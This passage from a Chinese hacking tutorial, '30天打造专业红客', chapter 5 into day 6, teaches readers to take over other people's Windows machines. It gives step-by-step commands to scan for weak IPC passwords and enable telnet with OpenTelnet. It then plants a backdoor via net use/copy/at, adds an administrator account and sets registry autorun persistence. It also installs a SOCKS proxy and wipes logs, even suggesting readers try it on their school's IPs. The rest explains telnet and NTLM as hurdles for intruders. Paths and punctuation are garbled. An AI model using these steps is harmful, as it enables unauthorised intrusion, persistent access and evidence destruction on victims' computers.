30天打造专业红客-第5章
按键盘上方向键 ← 或 → 可快速上下翻页,按键盘上的 Enter 键可回到本书目录页,按键盘上方向键 ↑ 可回到本页顶部!
————未阅读完?加入书签已便下次继续阅读!
继续讲,昨天有人说我找到个肉鸡,但不会用远程控制软件。先说用什么好呢
我推荐Remote Administrator,有篇介绍它的文章很好:pcworld/2002/back_issues/2205/0533e。asp
下载:skycn/soft/15592。html
我想里面的说明你应该能很好理解的
现在我以一个例子来说一下怎么获得一个肉鸡,虽然前面一直在说,但好象有点乱的,下面说的这个有点投机取巧的感觉,至少我这样觉得,不过因为很多朋友说都5天了,我什么都没搞到啊,所以只能。。
第一步:扫描弱口令
这里我用20cn开发的scanipc (这down。yqdown/xdown/yqdown0316/scanipc。rar有下的)
不一会就会扫到很多有弱口令的主机
(你可以拿你们学校的IP试试)
这里我用opentelnet(远程启动TELNET的小东西,这里下:infosw/down/software。asp?id=1520)给扫描到开了空口令的主机开个端口让我们telnet连接上去
;开了23端口,并可以连接上的主机就不用进行次步骤了!
Opentelnet使用方法:
OpenTelnet。exe server
列如:
C:》OpenTelnet。exe 192。168。1。2 administrator 123456 1 90 用户名:administrator 密码:123456
NTLM认证方式:1(也可以选择0请自己测试) 开的端口:90
运行完,如果屏幕上出现 Disconnecting server。。。Successfully! 就说明已经成功。
这样,我们就能够得到一个开90端口的Telnet服务器了。
Telnet 192。168。1。2 90
这样就可以登录上去了。
第三步:配置并安装后门程序
这里我选择WinShell(小巧精干我喜欢下载:hktk/soft/soft_server/winshell。html),用winshell主程序设置好后门,然后把后门程序传到台FTP空间上!
列如:
c:》ftp
ftp》opencnwill
然后输入用户名字 密码把后门传上去mput c:cnwill。exe
现在我们登陆到肉鸡上 Telnet 192。168。1。2 90
把刚上传的后门程序下载并运行(别忘记删除 后门程序)
『后门也可以用net命令完成』
net user 192。168。1。2 90ipc 〃〃 /user:〃administrator〃
' 建 立 IPC 连 接 '
copy d:zilong。exe 192。168。1。2 90adminsystem32
' 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里'
copy d:long。exe 192。168。1。2 90adminsystem32
'上 传 一 个 删 除 日 志 程 序 到 对 方 的 主 机 里'
copy d:scoks。exe 192。168。1。2 90adminsystem32
' 上 传 一 个 SCOKS 代 理 程 序 到 对 方 的 主 机 里'
copy d:zilong。reg 192。168。1。2 90adminsystem32
'上 传 导 入 注 册 表的 REG 文 件 到 对 方 的 主 机 里'请看后门说明
net time 192。168。1。2 90
' 得 到 对 方 主 机 的 当 前 时 间'
at 192。168。1。2 90 13:20 zilong。exe
'用 a t命 令 执 行 我 们 的 后 门 程 序' 别 把 时 间 搞 错 了 哦
如果大家用不习惯命令的话;那就用流光的IPC种植者吧;简单易用。这里就不赘述啦
=
telnet 192。168。1。2 90
' 从 我 们 设 置 的 后 门 程 序 登 陆 主 机 '
net user **** /add
'近来后添加一个用户名再说或者也可以选择激活guest'
net localgroup administrators **** /add
' 把 自 己 添 加 到 管 理 组 里;这 样 我 们 就 是 超 级 管 理 员 了'
regedit /s c:winntsystem32zilong。reg
' 把 后 门 程 序 导 入 注 册 表 的 启 动 项'这样做是防止被别人停止我们
的后门服务程序;就算我们的后门服务程序被停止了;在主机重启动后我们的后门
服务就又继续运行了。
SOCKS …install
' 开 始 安 装 socks 代 理'
SCOKS …config starttype 2
' 使 SOCKS 代 理 程 序 自 动 运 行,不 怕 肉 鸡 再 重 启 了'
socks …config port 1080
' socks 代 理 端 口 设 置 为 1080 '
net start skserver
' 启 动 SOCKS 代 理 服 务 '可以打开QQ设置IP代理了
long
' 刚 才 上 传 的 一 个 删 除 日 志 程 序;运 行 它 就 可 以 了'
'第6天'从telnet讲起
先说telnet;什么是telnet?Telnet服务虽然也属于客户机/服务器模型的服务,但它更大的意义在于实现了基于Telnet协议的远程登录(远程交互式计算),那么什么是远程登录?
我想这个大家都明白一点;定义:远程登陆是指用户使用Telnet命令,使自己的计算机暂时成为远程主机的一个仿真终端的过程。仿真终端等效于一个非智能的机器,它只负责把用户输入的每个字符传递给主机,再将主机输出的每个信息回显在屏幕上。
使用Telnet协议进行远程登陆时需要满足以下条件:在本的计算机上必须装有包含Telnet协议的客户程序;必须知道远程主机的Ip地址或域名;必须知道登录标识与口令。
Telnet远程登录服务分为以下4个过程:
1)本地与远程主机建立连接。该过程实际上是建立一个TCP连接,用户必须知道远程主机的Ip地址或域名;
2)将本地终端上输入的用户名和口令及以后输入的任何命令或字符以NVT(Net Virtual Terminal)格式传送到远程主机。该过程实际上是从本地主机向远程主机发送一个IP数据报;
3)将远程主机输出的NVT格式的数据转化为本地所接受的格式送回本地终端,包括输入命令回显和命令执行结果;
4)最后,本地终端对远程主机进行撤消连接。该过程是撤销一个TCP连接。
再说一下什么叫Telnet协议?简单点说Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议。应用Telnet协议能够把本地用户所使用的计算机变成远程主机系统的一个终端。它提供了三种基本服务:
1)Telnet定义一个网络虚拟终端为远的系统提供一个标准接口。客户机程序不必详细了解远的系统,他们只需构造使用标准接口的程序;
2)Telnet包括一个允许客户机和服务器协商选项的机制,而且它还提供一组标准选项;
3)Telnet对称处理连接的两端,即Telnet不强迫客户机从键盘输入,也不强迫客户机在屏幕上显示输出。
关于这个就说这么多了;至于其他的一些就不说了;因为没什么帮助对我门;如果你有兴趣;可以去本站查查相关资料
再说说Win2000的Telnet服务;因为大部分服务器用的都是2000的
Win2000为我们提供了Telnet客户机和服务器程序:Telnet。exe是客户机程序(Client),tlntsvr。exe是服务器程序(server),同时它还为我们提供了Telnet服务器管理程序tlntadmn。exe。 其实从应用层面上,Win2000的Telnet服务并没有什么可说的,绝大部分内容你都可以从HELP文件中得到,我在此只是把它稍微整理一下而已。Windows 2000 默认安装了 Telnet 服务,但是并没有默认启动。下面给出HELP文件中 Telnet 服务的一部分默认设置:
AllowTrustedDomain:是否允许域用户访问。默认值是1,允许信任域用户访问。可以改为0: 不允许域用户访问(只允许本地用户)。
DefaultDomain:可以对与该计算机具有信任关系的任何域设置。默认值是〃。〃。
DefaultShell:显示 shell 安装的路径位置。默认值是: %systemroot%System32Cmd。exe /q /k
MaxFailedLogins:在连接终止之前显示尝试登录失败的最大次数。默认是3。
LoginScript:显示 Telnet 服务器登录脚本的路径位置。默认的位置就是“%systemroot%System32login。cmd”,你可以更改脚本内容,这样登录进Telnet的欢迎屏幕就不一样了。
NTLM:NTLM身份验证选项。默认是2。可以有下面这些值:
0: 不使用 NTLM 身份验证。
1: 先尝试 NTLM 身份验证,如果失败,再使用用户名和密码。
2: 只使用 NTLM 身份验证。
TelnetPort:显示 telnet 服务器侦听 telnet 请求的端口。默认是:23。你也可以更改为其他端口。
以上各项设置你可以使用tlntadmn。exe(Telnet服务器管理程序)来进行非常方便的配置,配置后需要重新启动Telnet服务。如图1
2 NTLM
提到了telnet就不能不提NTLM,我想这也是让入侵者最为头痛的一件事,哪怕你获得了管理员帐号和密码,想简单通过NTLM也并非易事,况且win2000中的telnet默认仅以NTLM方式验证身份,这就让我们不得不关注NTLM这个东东,那么什么是NTLM呢?
早期的SMB协议在网络上明文传输口令,后来出现了〃LAN Manager Challenge/Response〃验证机制,简称LM,它十分简单以至很容易被破解,微软随后提出了WindowsNT挑战/响应验证机制,即NTLM。现在已经有了更新的NTLMv2以及Kerberos验证体系。NTLM工作流程是这样的:
1、客户端首先在本地加密当前用户的密码成为密码散列
2、客户端向服务器发送自己的帐号,这个帐号是没有经过加密的,明文直接传输
3、服务器产生一个16位的随机数字发送给客户端,作为一个 challenge(挑战)
4、客户端再用加密后的密码散列来加密这个 challenge ,然后把这个返回给服务器。作为 response(响应)
5、服务器把用户名、给客户端的challenge 、客户端返回的 response 这三个东西,发送域控制器
6、域控制器用这个用户名在 SAM密码管理库中找到这个用户的密码散列,然后使用这个密码散列来加密 challenge。
7、域控制器比较两次加密的 challenge ,如果一样,那么认证成功。
从上面的过程我们可以看出,NTLM是以当前用户的身份向Telnet服务器发送登录请求的,而不是用你扫到的对方管理员的帐户和密码登录,显然,你的登录将会失败。举个例子来说,你家的机器名为A(本地机器),你入侵的机器名为B(远地机器),你在A上的帐户是xinxin,密码是1234,你扫到B的管理员帐号是Administrator,密码是5678,当你想Telnet到B时,NTLM将自动以当前用户的帐号和密码作为登录的凭据来进行上面的7项操作,即用xinxin和1234,而并非用你扫到的Administrator和5678,且这些都是自动完成的,根本不给你插手的机会,因此你的登录操作将失败。
由于Telnet服务器对NTLM的使用有3个选项,所以当你Telnet远地机器时,会显示下面情况中的一种:
1)身份验证选项=0时
=
Microsoft (R) Windows (TM) Version 5。00 (Build 2195)
Wele to Microsoft Telnet Service
Telnet Server Build 5。00。99201。